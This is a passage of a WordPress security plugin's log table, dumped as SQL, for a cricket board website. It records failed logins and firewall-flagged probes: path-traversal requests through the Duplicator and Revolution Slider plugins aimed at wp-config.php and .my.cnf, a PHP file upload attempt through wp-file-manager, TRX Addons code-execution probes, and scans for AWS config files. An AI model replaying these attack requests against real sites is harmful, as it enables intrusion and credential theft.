Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(820,0.000000,1624620753.168369,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(821,0.000000,1624620823.768813,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(822,0.000000,1624620827.674343,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(823,0.000000,1624621265.549179,'\0\0\0\0\0\0\0\0\0\0���A�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(824,0.000000,1624621269.404960,'\0\0\0\0\0\0\0\0\0\0���A�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(825,0.000000,1624621742.347205,'\0\0\0\0\0\0\0\0\0\0��3S�\n',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(826,0.000000,1624621743.329773,'\0\0\0\0\0\0\0\0\0\0��3S�\n',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(827,0.000000,1624621896.953451,'\0\0\0\0\0\0\0\0\0\0���YY�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(828,0.000000,1624621899.016732,'\0\0\0\0\0\0\0\0\0\0���YY�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(829,0.000000,1624623535.364000,'\0\0\0\0\0\0\0\0\0\0����}�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(830,0.000000,1624623540.908406,'\0\0\0\0\0\0\0\0\0\0����}�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(831,1624743595.295900,1624743594.854047,'\0\0\0\0\0\0\0\0\0\0���6y�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=../index.php','','Chrome','learned:waf','Directory Traversal','{\"learningMode\":1,\"failedRules\":[12],\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vaW5kZXgucGhw\",\"category\":\"lfi\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249ZHVwbGljYXRvcl9kb3dubG9hZCZmaWxlPS4uJTJGaW5kZXgucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qClVzZXItQWdlbnQ6IENocm9tZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(832,1624743596.554300,1624743596.526664,'\0\0\0\0\0\0\0\0\0\0���6y�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php','','Chrome','learned:waf','Directory Traversal - wp-config.php','{\"learningMode\":1,\"failedRules\":[67],\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"category\":\"lfi\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249ZHVwbGljYXRvcl9kb3dubG9hZCZmaWxlPS4uJTJGd3AtY29uZmlnLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpVc2VyLUFnZW50OiBDaHJvbWUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(833,1624988286.460500,1624988286.043411,'\0\0\0\0\0\0\0\0\0\0����8r',0,200,0,0,0,'https://www.yorkshirecricketboard.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','learned:waf','Directory Traversal','{\"learningMode\":1,\"failedRules\":[12],\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vLi4vLm15LmNuZg==\",\"category\":\"lfi\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249cmV2c2xpZGVyX3Nob3dfaW1hZ2UmaW1nPS4uJTJGLi4lMkYubXkuY25mIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzEwXzEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8zOS4wLjIxNzEuOTUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(834,1624988290.158200,1624988290.133630,'\0\0\0\0\0\0\0\0\0\0����8r',0,200,0,0,0,'https://www.yorkshirecricketboard.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','learned:waf','Directory Traversal - wp-config.php','{\"learningMode\":1,\"failedRules\":[67],\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"category\":\"lfi\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249cmV2c2xpZGVyX3Nob3dfaW1hZ2UmaW1nPS4uJTJGd3AtY29uZmlnLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xMF8xKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzkuMC4yMTcxLjk1IFNhZmFyaS81MzcuMzYKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(835,1624989465.874200,1624989465.533818,'\0\0\0\0\0\0\0\0\0\0����8r',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','learned:waf','Directory Traversal','{\"learningMode\":1,\"failedRules\":[12],\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vLi4vLm15LmNuZg==\",\"category\":\"lfi\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249cmV2c2xpZGVyX3Nob3dfaW1hZ2UmaW1nPS4uJTJGLi4lMkYubXkuY25mIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzEwXzEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8zOS4wLjIxNzEuOTUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(836,1624989482.315400,1624989482.049581,'\0\0\0\0\0\0\0\0\0\0����8r',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','learned:waf','Directory Traversal - wp-config.php','{\"learningMode\":1,\"failedRules\":[67],\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"category\":\"lfi\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249cmV2c2xpZGVyX3Nob3dfaW1hZ2UmaW1nPS4uJTJGd3AtY29uZmlnLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xMF8xKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzkuMC4yMTcxLjk1IFNhZmFyaS81MzcuMzYKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(837,1626197940.910493,1626197940.774000,'\0\0\0\0\0\0\0\0\0\0����8t',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"a2lyaS5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpFeHBlY3Q6IDEwMC1jb250aW51ZQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQwNDQuMTI5IFNhZmFyaS81MzcuMzYKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS02NmUzY2E5MzI4MWM3MDUwCkNvbnRlbnQtTGVuZ3RoOiAxNzM5CgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTY2ZTNjYTkzMjgxYzcwNTAKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjbWQiCgp1cGxvYWQKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS02NmUzY2E5MzI4MWM3MDUwCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idGFyZ2V0IgoKbDFfTHcKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS02NmUzY2E5MzI4MWM3MDUwLS0K\"}'),(838,1626197940.824178,1626197940.700300,'\0\0\0\0\0\0\0\0\0\0����8t',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"a2lyaS5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpFeHBlY3Q6IDEwMC1jb250aW51ZQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQwNDQuMTI5IFNhZmFyaS81MzcuMzYKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS02NmUzY2E5MzI4MWM3MDUwCkNvbnRlbnQtTGVuZ3RoOiAxNzM5CgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTY2ZTNjYTkzMjgxYzcwNTAKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjbWQiCgp1cGxvYWQKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS02NmUzY2E5MzI4MWM3MDUwCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idGFyZ2V0IgoKbDFfTHcKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS02NmUzY2E5MzI4MWM3MDUwLS0K\"}'),(839,1626695946.690174,1626695946.598600,'\0\0\0\0\0\0\0\0\0\0���7��',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1qc29uL3RyeF9hZGRvbnMvdjIvZ2V0L3NjX2xheW91dD9zYz1wcmludF9yIEhUVFAvMS4xClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjQKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(840,1626699303.271413,1626699303.116900,'\0\0\0\0\0\0\0\0\0\0���7��',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1qc29uL3RyeF9hZGRvbnMvdjIvZ2V0L3NjX2xheW91dD9zYz1wcmludF9yIEhUVFAvMS4xClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjQKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(841,1627596321.234843,1627596321.146200,'\0\0\0\0\0\0\0\0\0\0���7��',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1qc29uL3RyeF9hZGRvbnMvdjIvZ2V0L3NjX2xheW91dD9zYz1wcmludF9yIEhUVFAvMS4xClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjQKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(842,1627626682.550156,1627626682.462800,'\0\0\0\0\0\0\0\0\0\0���7��',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1qc29uL3RyeF9hZGRvbnMvdjIvZ2V0L3NjX2xheW91dD9zYz1wcmludF9yIEhUVFAvMS4xClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjQKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(843,1629844856.278056,1629844856.197200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcuanMgSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(844,1629844854.949346,1629844854.868700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(845,1629844853.830458,1629844853.754300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcvYXdzLnltbCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(846,1629844852.601916,1629844852.522300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LG